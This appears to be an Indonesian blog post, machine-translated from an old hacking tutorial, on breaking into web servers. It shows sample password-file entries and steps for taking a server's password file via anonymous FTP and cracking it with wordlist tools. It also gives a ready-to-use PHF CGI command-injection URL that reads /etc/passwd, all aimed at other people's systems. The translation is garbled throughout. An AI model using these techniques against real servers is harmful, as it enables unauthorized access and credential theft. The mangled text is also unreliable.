Hacking Halaman Web
Mendapatkan password file melalui FTP
Ok juga salah satu cara termudah mendapatkan akses superuser, adalah melalui
anonymous ftp akses ke sebuah halaman web. Pertama Anda perlu belajar sedikit tentang
sandi file ...
root: User: d7Bdg: 1n2HG2: 1127:20: superuser
TomJones: p5Y (h0tiC: 1229:20: Tom Jones,: / usr / orang / tomjones: / bin / csh
BBob: EUyd5XAAtv2dA: 1129:20: Billy Bob: / usr / orang / bbob: / bin / csh
Ini merupakan contoh yang biasa dienkripsi password file. Superuser adalah
bagian yang memberikan anda root. Yang utama bagian dari file.
root: x: 0:1: superuser: /:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin: x: 203:102: ftp Administrator: / u1/ftp
Ini adalah contoh lain dari file password, hanya satu ini memiliki sedikit
perbedaan, itu shadowed. Shadowed password file tidak membuat Anda melihat atau
menyalin sebenarnya dienkripsi sandi. Hal ini menyebabkan masalah untuk sandi
pembuat kerupuk dan kamus (keduanya dijelaskan dalam teks). Berikut adalah
contoh lain dari file shadowed password:
root: x :0:1:0000-Admin (0000 ):/:/ usr / bin / csh
daemon: x :1:1:0000-Admin (0000): /:
bin: x :2:2:0000-Admin (0000): / usr / bin:
sys: x :3:3:0000-Admin (0000): /:
ADM: x :4:4:0000-Admin (0000): / var / ADM:
lp: x :71:8:0000-lp (0000): / usr / spool / lp:
smtp: x: 0:0: mail daemon user: /:
uucp: x :5:5:0000-uucp (0000): / usr / lib / uucp:
nuucp: x :9:9:0000-uucp (0000): / var / spool / uucppublic: / usr / lib / uucp / uucico
mendengarkan: x: 37:4: Jaringan Pentadbiran: / usr / net / NLS:
nobody: x: 60001:60001: uid no body: /:
noaccess: x: 60002:60002: uid tidak akses: /:
webmastr: x: 53:53: WWW Admin: / ekspor / home / webmastr: / usr / bin / csh
pin4geo: x: 55:55: PinPaper Admin: / export/home/webmastr/new/gregY/test/pin4geo: / bin / palsu
ftp:x:54:54:Anonymous FTP: / ekspor / home / anon_ftp: / bin / palsu
Shadowed password file memiliki "x" di tempat password atau kadang-kadang
samar-samar mereka sebagai * juga.
Sekarang bahwa Anda tahu sedikit lebih tentang apa yang sebenarnya password file terlihat
seperti Anda harus mampu mengidentifikasi biasa dienkripsi dari shadowed pw
pw file. Kami sekarang dapat berjalan untuk berbicara tentang bagaimana untuk retak itu.
Cracking password file tidak rumit karena akan kelihatan, walaupun
bervariasi dari sistem file ke sistem.
1.The langkah pertama yang akan Anda ambil adalah
untuk men-download atau menyalin file.
2. Langkah kedua adalah untuk menemukan password
kerupuk dan pembuat kamus. Walaupun itu hampir mustahil untuk menemukan
baik kerupuk ada beberapa yang ok di luar sana. Saya menyarankan Anda melihat
Kerupuk untuk Jack, John the ripper, brute Kerupuk, atau Jack yang ripper.
Sekarang untuk kamus pembuat atau kamus file ... Ketika Anda mulai
cracking prog Anda akan diminta untuk menemukan password file. Di sinilah kita
kamus pembuat datang in Anda dapat men-download satu dari hampir setiap hacker
halaman di internet. Sebuah kamus pembuat menemukan semua kemungkinan huruf
kombinasi dengan huruf yang Anda pilih (ASCII, tudung-tudung ais, huruf kecil, dan
numerik huruf juga akan ditambahkan). Kami akan merilis kami pasword file
ke publik segera, akan dipanggil, gila Candy, "The Perfect Drug."
Sejauh yang kita tahu akan menjadi salah satu yang terbesar di sirkulasi.
3. Anda kemudian jalankan kerupuk dan ikuti petunjuk yang memberikan
kamu.
The PHF Teknik
Yang saya tidak yakin jika saya harus menyertakan bagian ini disebabkan oleh fakta bahwa
semua orang sudah mengetahui dan kebanyakan server telah menemukan tentang
bug dan tetap itu. Tetapi karena saya telah diminta pertanyaan tentang phf
Saya memutuskan untuk memasukkannya.
Phf teknik yang jauh adalah dengan cara termudah mendapatkan password file
(meskipun tidak bekerja 95% dari waktu). Tetapi untuk melakukan semua phf Anda lakukan
adalah membuka browser dan ketik link berikut:
http://webpage_goes_here/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd
Anda ganti webpage_goes_here dengan domain. Jadi jika Anda mencoba untuk
mendapatkan pw file untuk www.webpage.com Anda akan jenis:
http://www.webpage.com/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd
dan's! Anda hanya duduk kembali dan menyalin file .
Cetak Halaman Ini
Post a Comment